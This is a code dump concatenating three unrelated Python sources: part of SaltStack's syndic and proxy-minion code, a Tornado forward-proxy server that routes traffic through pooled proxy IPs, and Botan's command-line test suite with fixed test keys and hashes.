self.opts['acceptance_wait_time_max'] self._has_master = threading.Event() self.jid_forward_cache = set() if io_loop is None: install_zmq() self.io_loop = ZMQDefaultLoop.current() else: self.io_loop = io_loop # List of events self.raw_events = [] # Dict of rets: {master_id: {event_tag: job_ret, ...}, ...} self.job_rets = {} # List of delayed job_rets which was unable to send for some reason and will be resend to # any available master self.delayed = [] # Active pub futures: {master_id: (future, [job_ret, ...]), ...} self.pub_futures = {} def _spawn_syndics(self): ''' Spawn all the coroutines which will sign in the syndics ''' self._syndics = OrderedDict() # mapping of opts['master'] -> syndic masters = self.opts['master'] if not isinstance(masters, list): masters = [masters] for master in masters: s_opts = copy.copy(self.opts) s_opts['master'] = master self._syndics[master] = self._connect_syndic(s_opts) @tornado.gen.coroutine def _connect_syndic(self, opts): ''' Create a syndic, and asynchronously connect it to a master ''' auth_wait = opts['acceptance_wait_time'] failed = False while True: if failed: if auth_wait < self.max_auth_wait: auth_wait += self.auth_wait log.debug( "sleeping before reconnect attempt to %s [%d/%d]", opts['master'], auth_wait, self.max_auth_wait, ) yield tornado.gen.sleep(auth_wait) # TODO: log? log.debug( 'Syndic attempting to connect to %s', opts['master'] ) try: syndic = Syndic(opts, timeout=self.SYNDIC_CONNECT_TIMEOUT, safe=False, io_loop=self.io_loop, ) yield syndic.connect_master(failed=failed) # set up the syndic to handle publishes (specifically not event forwarding) syndic.tune_in_no_block() # Send an event to the master that the minion is live syndic.fire_master_syndic_start() log.info( 'Syndic successfully connected to %s', opts['master'] ) break except SaltClientError as exc: failed = True log.error( 'Error while bringing up syndic for multi-syndic. Is the ' 'master at %s responding?', opts['master'] ) except (KeyboardInterrupt, SystemExit): raise except Exception: failed = True log.critical( 'Unexpected error while connecting to %s', opts['master'], exc_info=True ) raise tornado.gen.Return(syndic) def _mark_master_dead(self, master): ''' Mark a master as dead. This will start the sign-in routine ''' # if its connected, mark it dead if self._syndics[master].done(): syndic = self._syndics[master].result() # pylint: disable=no-member self._syndics[master] = syndic.reconnect() else: # TODO: debug? log.info( 'Attempting to mark %s as dead, although it is already ' 'marked dead', master ) def _call_syndic(self, func, args=(), kwargs=None, master_id=None): ''' Wrapper to call a given func on a syndic, best effort to get the one you asked for ''' if kwargs is None: kwargs = {} successful = False # Call for each master for master, syndic_future in self.iter_master_options(master_id): if not syndic_future.done() or syndic_future.exception(): log.error( 'Unable to call %s on %s, that syndic is not connected', func, master ) continue try: getattr(syndic_future.result(), func)(*args, **kwargs) successful = True except SaltClientError: log.error( 'Unable to call %s on %s, trying another...', func, master ) self._mark_master_dead(master) if not successful: log.critical('Unable to call %s on any masters!', func) def _return_pub_syndic(self, values, master_id=None): ''' Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for ''' func = '_return_pub_multi' for master, syndic_future in self.iter_master_options(master_id): if not syndic_future.done() or syndic_future.exception(): log.error( 'Unable to call %s on %s, that syndic is not connected', func, master ) continue future, data = self.pub_futures.get(master, (None, None)) if future is not None: if not future.done(): if master == master_id: # Targeted master previous send not done yet, call again later return False else: # Fallback master is busy, try the next one continue elif future.exception(): # Previous execution on this master returned an error log.error( 'Unable to call %s on %s, trying another...', func, master ) self._mark_master_dead(master) del self.pub_futures[master] # Add not sent data to the delayed list and try the next master self.delayed.extend(data) continue future = getattr(syndic_future.result(), func)(values, '_syndic_return', timeout=self._return_retry_timer(), sync=False) self.pub_futures[master] = (future, values) return True # Loop done and didn't exit: wasn't sent, try again later return False def iter_master_options(self, master_id=None): ''' Iterate (in order) over your options for master ''' masters = list(self._syndics.keys()) if self.opts['syndic_failover'] == 'random': shuffle(masters) if master_id not in self._syndics: master_id = masters.pop(0) else: masters.remove(master_id) while True: yield master_id, self._syndics[master_id] if not masters: break master_id = masters.pop(0) def _reset_event_aggregation(self): self.job_rets = {} self.raw_events = [] def reconnect_event_bus(self, something): future = self.local.event.set_event_handler(self._process_event) self.io_loop.add_future(future, self.reconnect_event_bus) # Syndic Tune In def tune_in(self): ''' Lock onto the publisher. This is the main event loop for the syndic ''' self._spawn_syndics() # Instantiate the local client self.local = salt.client.get_local_client( self.opts['_minion_conf_file'], io_loop=self.io_loop) self.local.event.subscribe('') log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id']) # register the event sub to the poller self.job_rets = {} self.raw_events = [] self._reset_event_aggregation() future = self.local.event.set_event_handler(self._process_event) self.io_loop.add_future(future, self.reconnect_event_bus) # forward events every syndic_event_forward_timeout self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events, self.opts['syndic_event_forward_timeout'] * 1000, ) self.forward_events.start() # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() self.io_loop.start() def _process_event(self, raw): # TODO: cleanup: Move down into event class mtag, data = self.local.event.unpack(raw, self.local.event.serial) log.trace('Got event %s', mtag) # pylint: disable=no-member tag_parts = mtag.split('/') if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \ salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \ 'return' in data: if 'jid' not in data: # Not a job return return if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1): log.debug('Return received with matching master_id, not forwarding') return master = data.get('master_id') jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {}) if not jdict: jdict['__fun__'] = data.get('fun') jdict['__jid__'] = data['jid'] jdict['__load__'] = {} fstr = '{0}.get_load'.format(self.opts['master_job_cache']) # Only need to forward each load once. Don't hit the disk # for every minion return! if data['jid'] not in self.jid_forward_cache: jdict['__load__'].update( self.mminion.returners[fstr](data['jid']) ) self.jid_forward_cache.add(data['jid']) if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']: # Pop the oldest jid from the cache tmp = sorted(list(self.jid_forward_cache)) tmp.pop(0) self.jid_forward_cache = set(tmp) if master is not None: # __'s to make sure it doesn't print out on the master cli jdict['__master_id__'] = master ret = {} for key in 'return', 'retcode', 'success': if key in data: ret[key] = data[key] jdict[data['id']] = ret else: # TODO: config to forward these? If so we'll have to keep track of who # has seen them # if we are the top level masters-- don't forward all the minion events if self.syndic_mode == 'sync': # Add generic event aggregation here if 'retcode' not in data: self.raw_events.append({'data': data, 'tag': mtag}) def _forward_events(self): log.trace('Forwarding events') # pylint: disable=no-member if self.raw_events: events = self.raw_events self.raw_events = [] self._call_syndic('_fire_master', kwargs={'events': events, 'pretag': tagify(self.opts['id'], base='syndic'), 'timeout': self._return_retry_timer(), 'sync': False, }, ) if self.delayed: res = self._return_pub_syndic(self.delayed) if res: self.delayed = [] for master in list(six.iterkeys(self.job_rets)): values = list(six.itervalues(self.job_rets[master])) res = self._return_pub_syndic(values, master_id=master) if res: del self.job_rets[master] class ProxyMinionManager(MinionManager): ''' Create the multi-minion interface but for proxy minions ''' def _create_minion_object(self, opts, timeout, safe, io_loop=None, loaded_base_name=None, jid_queue=None): ''' Helper function to return the correct type of object ''' return ProxyMinion(opts, timeout, safe, io_loop=io_loop, loaded_base_name=loaded_base_name, jid_queue=jid_queue) def _metaproxy_call(opts, fn_name): metaproxy = salt.loader.metaproxy(opts) try: metaproxy_name = opts['metaproxy'] except KeyError: metaproxy_name = 'proxy' log.trace( 'No metaproxy key found in opts for id %s. ' 'Defaulting to standard proxy minion.', opts['id'] ) metaproxy_fn = metaproxy_name + '.' + fn_name return metaproxy[metaproxy_fn] class ProxyMinion(Minion): ''' This class instantiates a 'proxy' minion--a minion that does not manipulate the host it runs on, but instead manipulates a device that cannot run a minion. ''' # TODO: better name... @tornado.gen.coroutine def _post_master_init(self, master): ''' Function to finish init after connecting to a master This is primarily loading modules, pillars, etc. (since they need to know which master they connected to) If this function is changed, please check Minion._post_master_init to see if those changes need to be propagated. ProxyMinions need a significantly different post master setup, which is why the differences are not factored out into separate helper functions. ''' mp_call = _metaproxy_call(self.opts, 'post_master_init') return mp_call(self, master) def _target_load(self, load): ''' Verify that the publication is valid and applies to this minion ''' mp_call = _metaproxy_call(self.opts, 'target_load') return mp_call(self, load) def _handle_payload(self, payload): mp_call = _metaproxy_call(self.opts, 'handle_payload') return mp_call(self, payload) @tornado.gen.coroutine def _handle_decoded_payload(self, data): mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload') return mp_call(self, data) @classmethod def _target(cls, minion_instance, opts, data, connected): mp_call = _metaproxy_call(opts, 'target') return mp_call(cls, minion_instance, opts, data, connected) @classmethod def _thread_return(cls, minion_instance, opts, data): mp_call = _metaproxy_call(opts, 'thread_return') return mp_call(cls, minion_instance, opts, data) @classmethod def _thread_multi_return(cls, minion_instance, opts, data): mp_call = _metaproxy_call(opts, 'thread_multi_return') return mp_call(cls, minion_instance, opts, data) class SProxyMinion(SMinion): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. The SProxyMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. ''' def gen_modules(self, initial_load=False): ''' Tell the minion to reload the execution modules CLI Example: .. code-block:: bash salt '*' sys.reload_modules ''' self.opts['grains'] = salt.loader.grains(self.opts) self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], saltenv=self.opts['saltenv'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts: errmsg = ( 'No "proxy" configuration key found in pillar or opts ' 'dictionaries for id {id}. Check your pillar/options ' 'configuration and contents. Salt-proxy aborted.' ).format(id=self.opts['id']) log.error(errmsg) self._running = False raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg) if 'proxy' not in self.opts: self.opts['proxy'] = self.opts['pillar']['proxy'] # Then load the proxy module self.proxy = salt.loader.proxy(self.opts) self.utils = salt.loader.utils(self.opts, proxy=self.proxy) self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy) self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy) self.matchers = salt.loader.matchers(self.opts) self.functions['sys.reload_modules'] = self.gen_modules self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy) fq_proxyname = self.opts['proxy']['proxytype'] # we can then sync any proxymodules down from the master # we do a sync_all here in case proxy code was installed by # SPM or was manually placed in /srv/salt/_modules etc. self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv']) self.functions.pack['__proxy__'] = self.proxy self.proxy.pack['__salt__'] = self.functions self.proxy.pack['__ret__'] = self.returners self.proxy.pack['__pillar__'] = self.opts['pillar'] # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__ self.utils = salt.loader.utils(self.opts, proxy=self.proxy) self.proxy.pack['__utils__'] = self.utils # Reload all modules so all dunder variables are injected self.proxy.reload_modules() if ('{0}.init'.format(fq_proxyname) not in self.proxy or '{0}.shutdown'.format(fq_proxyname) not in self.proxy): errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \ 'Check your proxymodule. Salt-proxy aborted.' log.error(errmsg) self._running = False raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg) self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])() proxy_init_fn = self.proxy[fq_proxyname + '.init'] proxy_init_fn(self.opts) self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy) # Sync the grains here so the proxy can communicate them to the master self.functions['saltutil.sync_grains'](saltenv='base') self.grains_cache = self.opts['grains'] self.ready = True
server.py
import random import socket import sys import traceback from multiprocessing import Process from tornado import httpclient, ioloop, iostream, web from tornado.httpclient import HTTPResponse from scylla.config import get_config from scylla.database import ProxyIP from scylla.loggings import logger # Using CurlAsyncHTTPClient because its proxy support httpclient.AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient") def get_proxy(https=False) -> ProxyIP: proxies: [ProxyIP] = ProxyIP.select().where(ProxyIP.is_valid == True).where(ProxyIP.stability >= 0.9) if https: proxies = proxies.where(ProxyIP.is_https == True) proxies = proxies.order_by(ProxyIP.updated_at.desc()).limit(63) proxy: ProxyIP = random.choice(proxies) return proxy class ForwardingRequestHandler(web.RequestHandler): """ A very rough ForwardingRequestHandler, only supports HTTP requests. """ SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT'] def data_received(self, chunk): pass def get_proxy_and_forward(self): https = False # At present, this proxy does not support https if self.request.uri.startswith('https'): https = True disable_forward_proxy = get_config('disable_forward_proxy', default=False) if disable_forward_proxy: self.forward() else: proxy = get_proxy(https=https) self.forward(host=proxy.ip, port=proxy.port) @web.asynchronous def get(self, *args, **kwargs): self.get_proxy_and_forward() @web.asynchronous def post(self, *args, **kwargs): self.get_proxy_and_forward() def handle_response(self, response: HTTPResponse): if response.body: self.write(response.body) self.finish() elif response.error: logger.debug('The forward proxy has an error: {}'.format(response.error)) self.finish() else: self.finish() def forward(self, host=None, port=None): try: url = self.request.uri body = self.request.body if not body: body = None httpclient.AsyncHTTPClient().fetch( httpclient.HTTPRequest( url=url, method=self.request.method, body=body, headers=self.request.headers, follow_redirects=False, validate_cert=False, proxy_host=host, proxy_port=port), self.handle_response) except httpclient.HTTPError as e: logger.debug("tornado signalled HTTPError {}".format(e)) self.set_status(500) self.finish() except: self.set_status(500) self.write("Internal server error:\n" + ''.join(traceback.format_exception(*sys.exc_info()))) self.finish() @web.asynchronous def connect(self): logger.debug('Start CONNECT to %s', self.request.uri) host, port = self.request.uri.split(':') client = self.request.connection.stream def close_client(data: bytes = None) -> None: if upstream.closed(): return if data: upstream.write(data) upstream.close() def upstream_close(data: bytes = None) -> None: if client.closed(): return if data: client.write(data) client.close() def start_tunnel(): logger.debug('CONNECT tunnel established to %s', self.request.uri) client.read_until_close(close_client, upstream.write) upstream.read_until_close(upstream_close, client.write) client.write(b'HTTP/1.0 200 Connection established\r\n\r\n') def on_proxy_response(data: bytes = None) -> None: if data: first_line = data.splitlines()[0] http_v, status, text = first_line.split(None, 2) if int(status) == 200: logger.debug('Connected to upstream proxy %s', proxy) start_tunnel() return self.set_status(500) self.finish() def start_proxy_tunnel() -> None: upstream.write(b'CONNECT %s HTTP/1.1\r\n' % self.request.uri.encode()) upstream.write(b'Host: %s\r\n' % self.request.uri.encode()) upstream.write(b'Proxy-Connection: Keep-Alive\r\n\r\n') upstream.read_until(b'\r\n\r\n', on_proxy_response) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) upstream = iostream.IOStream(s) proxy = get_proxy(self.request.uri.startswith('https')) if proxy: upstream.connect((proxy.ip, proxy.port), start_proxy_tunnel) else: upstream.connect((host, int(port)), start_tunnel) def make_app(): return web.Application([ (r'.*', ForwardingRequestHandler), ]) def start_forward_proxy_server(): app = make_app() port = int(get_config('proxy_port', default='8081')) app.listen(port) logger.info('Start forward proxy server on port {}'.format(port)) ioloop.IOLoop.current().start() def start_forward_proxy_server_non_blocking(): p = Process(target=start_forward_proxy_server, daemon=True) p.start()
test_cli.py
#!/usr/bin/python """ (C) 2018,2019 Jack Lloyd Botan is released under the Simplified BSD License (see license.txt) """ import subprocess import sys import os import logging import optparse # pylint: disable=deprecated-module import time import shutil import tempfile import re import random import json import binascii # pylint: disable=global-statement,unused-argument CLI_PATH = None TESTS_RUN = 0 TESTS_FAILED = 0 class TestLogHandler(logging.StreamHandler, object): def emit(self, record): # Do the default stuff first super(TestLogHandler, self).emit(record) if record.levelno >= logging.ERROR: global TESTS_FAILED TESTS_FAILED += 1 def setup_logging(options): if options.verbose: log_level = logging.DEBUG elif options.quiet: log_level = logging.WARNING else: log_level = logging.INFO lh = TestLogHandler(sys.stdout) lh.setFormatter(logging.Formatter('%(levelname) 7s: %(message)s')) logging.getLogger().addHandler(lh) logging.getLogger().setLevel(log_level) def random_port_number(): return random.randint(1024, 65535) def test_cli(cmd, cmd_options, expected_output=None, cmd_input=None, expected_stderr=None, use_drbg=True): global TESTS_RUN TESTS_RUN += 1 opt_list = [] if isinstance(cmd_options, str): opt_list = cmd_options.split(' ') elif isinstance(cmd_options, list): opt_list = cmd_options if use_drbg: fixed_drbg_seed = "802" * 32 drbg_options = ['--rng-type=drbg', '--drbg-seed=' + fixed_drbg_seed] else: drbg_options = [] cmdline = [CLI_PATH, cmd] + drbg_options + opt_list logging.debug("Executing '%s'" % (' '.join([CLI_PATH, cmd] + opt_list))) stdout = None stderr = None if cmd_input is None: proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (stdout, stderr) = proc.communicate() else: proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (stdout, stderr) = proc.communicate(cmd_input.encode()) if stderr: if expected_stderr is None: logging.error("Got output on stderr %s (stdout was %s)", stderr, stdout) else: if stderr != expected_stderr: logging.error("Got output on stderr %s which did not match expected value %s", stderr, expected_stderr) output = stdout.decode('ascii').strip() if expected_output is not None: if output != expected_output: logging.error("Got unexpected output running cmd %s %s", cmd, cmd_options) logging.info("Output lengths %d vs expected %d", len(output), len(expected_output)) logging.info("Got %s", output) logging.info("Exp %s", expected_output) return output def check_for_command(cmd): cmdline = [CLI_PATH, 'has_command', cmd] proc = subprocess.Popen(cmdline) proc.communicate() return proc.returncode == 0 def cli_config_tests(_tmp_dir): prefix = test_cli("config", "prefix") cflags = test_cli("config", "cflags") ldflags = test_cli("config", "ldflags") libs = test_cli("config", "libs") if len(prefix) < 4 or prefix[0] != '/': logging.error("Bad prefix %s" % (prefix)) if ("-I%s/include/botan-2" % (prefix)) not in cflags: logging.error("Bad cflags %s" % (cflags)) if not ldflags.endswith(("-L%s/lib" % (prefix))): logging.error("Bad ldflags %s" % (ldflags)) if "-lbotan-2" not in libs: logging.error("Bad libs %s" % (libs)) def cli_help_tests(_tmp_dir): output = test_cli("help", None, None) # Maybe test format somehow?? if len(output) < 500: logging.error("Help output seems very short") def cli_version_tests(_tmp_dir): output = test_cli("version", None, None) version_re = re.compile(r'[0-9]\.[0-9]+\.[0-9]') if not version_re.match(output): logging.error("Unexpected version output %s" % (output)) output = test_cli("version", ["--full"], None, None) version_full_re = re.compile(r'Botan [0-9]\.[0-9]+\.[0-9] \(.* revision .*, distribution .*\)') if not version_full_re.match(output): logging.error("Unexpected version output %s" % (output)) def cli_is_prime_tests(_tmp_dir): test_cli("is_prime", "5", "5 is probably prime") test_cli("is_prime", "9", "9 is composite") test_cli("is_prime", "548950623407687320763", "548950623407687320763 is probably prime") def cli_gen_prime_tests(_tmp_dir): test_cli("gen_prime", "64", "15568813029901363163") test_cli("gen_prime", "128", "287193909494025008847286845478788766073") def cli_entropy_tests(_tmp_dir): output = test_cli("entropy", ["all"], None) status_re = re.compile('Polling [a-z0-9_]+ gathered [0-9]+ bytes in [0-9]+ outputs with estimated entropy [0-9]+') unavail_re = re.compile('Source [a-z0-9_]+ is unavailable') comp_re = re.compile('Sample from [a-z0-9_]+ was .* compressed from [0-9]+ bytes to [0-9]+ bytes') output_re = re.compile(r'[A-F0-9]+(...)?') status_next = True for line in output.split('\n'): if comp_re.match(line): continue if status_next: if status_re.match(line) is not None: status_next = False elif unavail_re.match(line) is not None: pass else: logging.error('Unexpected status line %s', line) status_next = False else: if output_re.match(line) is None: logging.error('Unexpected sample line %s', line) status_next = True def cli_factor_tests(_tmp_dir): test_cli("factor", "97", "97: 97") test_cli("factor", "9753893489562389", "9753893489562389: 21433 455087644733") test_cli("factor", "12019502040659149507", "12019502040659149507: 3298628633 3643787579") def cli_mod_inverse_tests(_tmp_dir): test_cli("mod_inverse", "97 802", "339") test_cli("mod_inverse", "98 802", "0") def cli_base64_tests(_tmp_dir): test_cli("base64_enc", "-", "YmVlcyE=", "bees!") test_cli("base64_dec", "-", "bees!", "YmVlcyE=") def cli_base32_tests(_tmp_dir): test_cli("base32_enc", "-", "MJSWK4ZB", "bees!") test_cli("base32_dec", "-", "bees!", "MJSWK4ZB") def cli_base58_tests(_tmp_dir): test_cli("base58_enc", "-", "C6sRAr4", "bees!") test_cli("base58_dec", "-", "bees!", "C6sRAr4") test_cli("base58_enc", ["--check", "-"], "Cjv15cdjaBc", "F00F") test_cli("base58_dec", ["--check", "-"], "F00F", "Cjv15cdjaBc") def cli_hex_tests(_tmp_dir): test_cli("hex_enc", "-", "6265657321", "bees!") test_cli("hex_dec", "-", "bees!", "6265657321") def cli_hash_tests(_tmp_dir): test_cli("hash", "--algo=SHA-256", "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 -", "") test_cli("hash", "--algo=SHA-256", "BA7816BF8F01CFEA414140DE5DAE2223B00361A396177A9CB410FF61F20015AD -", "abc") test_cli("hash", ["--algo=SHA-256", "--format=base64"], "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= -", "abc") test_cli("hash", ["--algo=SHA-224", "--format=base58", "--no-fsname"], "MuGc8HkSVyJjfMjPM5UQikPToBTzNucEghcGLe", "abc") test_cli("hash", ["--algo=SHA-224", "--format=base58check", "--no-fsname"], "3MmfMqgrhemdVa9bDAGfooukbviWtKMBx2xauL2RsyAe", "abc") def cli_hmac_tests(tmp_dir): key_file = os.path.join(tmp_dir, 'hmac.key') test_cli("rng", ["64", "--output=%s" % (key_file)], "") test_cli("hmac", ["--no-fsname", "--hash=SHA-384", key_file, key_file], "E3A8529377030B28A7DBDFC50DDEC8E4ECEFB6EA850D95EB785938CD3E3AFEF9EF8B08AF219C1496633193468AB755CB") def cli_bcrypt_tests(_tmp_dir): test_cli("gen_bcrypt", "--work-factor=4 s3kr1t", "$2a$04$0.8G7o08XYwvBBWA3l0WUujtwoGZgGDzVSN8fNkNqXikcK4A3lHPS") test_cli("check_bcrypt", "s3kr1t $2a$04$gHX4Qg7pDSJuXiPXnmt8leyb.FFzX1Bv4rXwIj2cPSakJ8zNnhIka", "Password is valid") test_cli("check_bcrypt", "santa $2a$04$gHX4Qg7pDSJuXiPXnmt8leyb.FFzX1Bv4rXwIj2cPSakJ8zNnhIka", "Password is NOT valid") def cli_argon2_tests(_tmp_dir): password = "s3kr1t" expected = "$argon2id$v=19$m=8,t=1,p=1$2A+I9q2+ZayxDDYC5n2YWw$/Lhx+Jbtlpw+Kxpskfv7+AKhBL/5ebalTJkVC1O5+1E" test_cli("gen_argon2", ['--mem=8', password], expected) test_cli("gen_argon2", ['--mem=8', '--t=1', password], expected) test_cli("gen_argon2", ['--mem=8', '--t=1', '--p=1', password], expected) test_cli("check_argon2", [password, expected], "Password is valid") test_cli("check_argon2", ["guessing", expected], "Password is NOT valid") def cli_gen_dl_group_tests(_tmp_dir): pem = """-----BEGIN X9.42 DH PARAMETERS----- MIIBJAKBgwVcMHlFVo64S86Y5KrlClZrIibOQ6iKm8Ih3Eb53XoQiSc33GtilRmP f7qKIVI86meoJHVU7gtaJk82yAYk6BksmZn0eXvUU7zD8yF/yH3yym0SfI0eH1OC 2+esfGblePpHCtt5uO56pzIqCIpOq+8gTG7JbFHJvTb8nwmAWFLZvjepAoGDBHOP e5A/RNyeXz+16+7Jjh4QOXWo/c6kM0WrIHgFbaIkupRndG5bcy8aCjsbgiIpeWy1 aNDURFB3UR3q1Si0gA7cvirDOH7lnN3C9zeohq+VPy5L7S3gKLGB1HXY/r2qLKhM 6ziphMYZxtr+XhsbxbA/+MuNoP/He+kwlGLtDKiBdF4CFjgPiPatvmWssQw2AuZ9 mFvAZ/8wal0= -----END X9.42 DH PARAMETERS-----""" test_cli("gen_dl_group", "--pbits=1043", pem) dsa_grp = """-----BEGIN X9.42 DH PARAMETERS----- MIIBHgKBgQCyP1vosC/axliM2hmJ9EOSdd1zBkuzMP25CYD8PFkRVrPLr1ClSUtn eXTIsHToJ7d7sRwtidQGW9BrvUEyiAWE06W/wnLPxB3/g2/l/P2EhbNmNHAO7rV7 ZVz/uKR4Xcvzxg9uk5MpT1VsxA8H6VEwzefNF1Rya92rqGgBTNT3/wKBgC7HLL8A Gu3tqJxTk1iNgojjOiSreLn6ihA8R8kQnRXDTNtDKz996KHGInfMBurUI1zPM3xq bHc0CvU1Nf87enhPIretzJcFgiCWrNFUIC25zPEjp0s3/ERHT4Bi1TABZ3j6YUEQ fnnj+9XriKKHf2WtX0T4FXorvnKq30m934rzAhUAvwhWDK3yZEmphc7dwl4/J3Zp +MU= -----END X9.42 DH PARAMETERS-----""" test_cli("gen_dl_group", ["--type=dsa", "--pbits=1024"], dsa_grp) def cli_key_tests(tmp_dir): pem = """-----BEGIN PRIVATE KEY----- MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQg2A+I9q2+ZayxDDYC5n2Y W8Bn/zBm4D3mwS5qMwADRDehRANCAATwnDFqsjXL9SD/Rr1Vy4pb79PswXdQNZBN mlLtJ5JvZ0/p6zP3x+Y9yPIrAR8L/acG5ItSrAKXzzuqQQZMv4aN -----END PRIVATE KEY-----""" priv_key = os.path.join(tmp_dir, 'priv.pem') pub_key = os.path.join(tmp_dir, 'pub.pem') pub_der_key = os.path.join(tmp_dir, 'pub.der') enc_pem = os.path.join(tmp_dir, 'priv_enc.pem') enc_der = os.path.join(tmp_dir, 'priv_enc.der') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') user_cert = os.path.join(tmp_dir, 'user.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp256k1"], pem) test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "") test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "") test_cli("pkcs8", "--pub-out --der-out --output=%s %s" % (pub_der_key, priv_key), "") test_cli("pkcs8", "--pass-out=foof --der-out --output=%s %s" % (enc_der, priv_key), "") test_cli("pkcs8", "--pass-out=foof --output=%s %s" % (enc_pem, priv_key), "") dec_pem = test_cli("pkcs8", ["--pass-in=foof", enc_pem], None) dec_der = test_cli("pkcs8", ["--pass-in=foof", enc_der], None) if dec_pem != dec_der: logging.error("Problem decrypting PKCS8 key") test_cli("fingerprint", ['--no-fsname', pub_key], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") test_cli("fingerprint", ['--no-fsname', pub_der_key], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") test_cli("fingerprint", ['--no-fsname', pub_key, pub_der_key], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4\n" "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") test_cli("fingerprint", [pub_der_key], pub_der_key + ": 83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4") test_cli("fingerprint", ['-'], "83:FC:67:87:30:C7:0C:9C:54:9A:E7:A1:FA:25:83:4C:77:A4:43:16:33:6D:47:3C:CE:4B:91:62:30:97:62:D4", open(pub_key, 'rb').read().decode()) valid_sig = "nI4mI1ec14Y7nYUWs2edysAVvkob0TWpmGh5rrYWDA+/W9Fj0ZM21qJw8qa3/avAOIVBO6hoMEVmfJYXlS+ReA==" test_cli("sign", "--provider=base %s %s" % (priv_key, pub_key), valid_sig) test_cli("verify", [pub_key, pub_key, '-'], "Signature is valid", valid_sig) test_cli("verify", [pub_key, pub_key, '-'], "Signature is invalid", valid_sig.replace("G", "H")) test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust") cert_info = test_cli("cert_info", ['--fingerprint', ca_cert], None) if cert_info.find('Subject: CN="CA",C="VT"') < 0: logging.error('Unexpected output for cert_info command %s', cert_info) if cert_info.find('Subject keyid: 69DD911C9EEE3400C67CBC3F3056CBE711BD56AF9495013F') < 0: logging.error('Unexpected output for cert_info command %s', cert_info) test_cli("gen_pkcs10", "%s User --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, user_cert)) test_cli("cert_verify", [user_cert, ca_cert], "Certificate passes validation checks") test_cli("cert_verify", user_cert, "Certificate did not validate - Certificate issuer not found") def cli_xmss_sign_tests(tmp_dir): priv_key = os.path.join(tmp_dir, 'priv.pem') pub_key = os.path.join(tmp_dir, 'pub.pem') pub_key2 = os.path.join(tmp_dir, 'pub2.pem') msg = os.path.join(tmp_dir, 'input') sig1 = os.path.join(tmp_dir, 'sig1') sig2 = os.path.join(tmp_dir, 'sig2') test_cli("rng", ['--output=%s' % (msg)], "") test_cli("hash", ["--no-fsname", msg], "E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855") test_cli("keygen", ["--algo=XMSS", "--output=%s" % (priv_key)], "") test_cli("hash", ["--no-fsname", priv_key], "5B38F737BA41BE7F40433DB30EAEF7C41ABB0F7D9E7A09DEB5FDCE7B6811693F") test_cli("pkcs8", "--pub-out --output=%s %s" % (pub_key, priv_key), "") test_cli("fingerprint", ['--no-fsname', pub_key], "B0:F4:98:6E:D8:4E:05:63:A1:D8:4B:37:61:5A:A0:41:78:7E:DE:0E:72:46:E0:A8:D6:CF:09:54:08:DA:A4:22") # verify the key is updated after each signature: test_cli("sign", [priv_key, msg, "--output=%s" % (sig1)], "") test_cli("verify", [pub_key, msg, sig1], "Signature is valid") test_cli("hash", ["--no-fsname", sig1], "04AF45451C7A9AF2D828E1AD6EC262E012436F4087C5DA6F32C689D781E597D0") 